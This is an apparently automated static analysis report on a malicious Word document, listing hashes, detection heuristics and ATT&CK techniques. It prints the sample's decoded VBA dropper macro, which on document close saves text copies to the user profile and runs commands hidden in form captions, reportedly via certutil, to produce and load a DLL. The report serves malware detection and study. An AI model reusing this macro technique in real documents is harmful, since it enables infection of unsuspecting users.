Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 10af5707c8f1a59c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 114.5 KB
Created: 2020-05-12 23:48:00
Authoring application: Microsoft Office Word
First seen: 2020-09-15
MD5: f567b6c855c603df4fc914ce307de065
SHA-1: cf2d28b6799c2e47c71e4d4007acdb0c70f2c092
SHA-256: 10af5707c8f1a59c31d0f57d99f6ca4386ba7cadd3b6b71a0eac05eacf631f5e
Risk Score: 170

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information

The sample contains VBA macros that call `CreateObject` and `Environ()`, indicating an attempt to interact with the system environment. The `CreateObject` argument is not a string literal in the macro but is read from the `ThisDocument.DefaultTargetFrame` document property, so the COM object being instantiated cannot be identified from the script text alone. The heuristic `SC_STR_CERTUTIL` suggests the use of certutil for downloading or decoding, which is often used to fetch and prepare malicious payloads. From its `Document_Close` handler, the VBA script repeatedly saves the document as plain text (`wdFormatText`) under `.xls`, `.doc`, and `.pub` extensions in the user's profile directory, likely as part of a multi-stage infection process.

Heuristics (6)

  • CLAMAV_DETECTION [critical]: ClamAV: Win.Malware.Agent-9662178-0
    ClamAV detected this file as malware: Win.Malware.Agent-9662178-0
  • SC_STR_CERTUTIL [high]: Reference to certutil (download/decode)
  • OLE_VBA_MACROS [medium, 2 related findings]: VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_CREATEOBJ [high]: CreateObject call
    Matched lines in script:
    Private Sub OpenForm()
        Set MainClass = CreateObject(ThisDocument.DefaultTargetFrame)
    End Sub
  • OLE_VBA_ENVIRON [low]: Environ() call (env variable access)
    Matched lines in script:
        Debug.Print "Please fill in the form": OpenForm
        Temporary = Environ$("USERPROFILE") + "\j5Iss52"
        ActiveDocument.SaveAs2 FileName:=Temporary + ".xls", FileFormat:=wdFormatText
  • EMBEDDED_URL [info]: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2739 bytes
SHA-256: a8cd5138d3ab8dd79e1c1b682137f1d4c0dd29317e2adcf55e341402f0c2b15a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private MainClass
Private Temporary As String

Private Sub Document_Close()
    Debug.Print "Please fill in the form": OpenForm
    Temporary = Environ$("USERPROFILE") + "\j5Iss52"
    ActiveDocument.SaveAs2 FileName:=Temporary + ".xls", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    MainClass.create Right(UserForm2.Caption, 9) + Right(UserForm2.Tag, 11) + Temporary + ".xls " + Temporary + ".dll", Null, Null, Data
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".pub", FileFormat:=wdFormatText
    ActiveDocument.SaveAs2 FileName:=Temporary + ".doc", FileFormat:=wdFormatText
    MainClass.create Right(UserForm1.Caption, 9) + Temporary + ".dll,R1", Null, Null, Data2
End Sub

Private Sub OpenForm()
    Set MainClass = CreateObject(ThisDocument.DefaultTargetFrame)
End Sub


Attribute VB_Name = "Module1"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{D8E25750-9D2E-4384-9754-171AA2B4A308}{9A6DBDD8-A9C9-497E-A259-969313144A71}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{70E3F0BA-B642-42C4-BF63-096A6CB988DB}{6F03AE86-629E-4CCE-A909-B9F9B868A1BD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False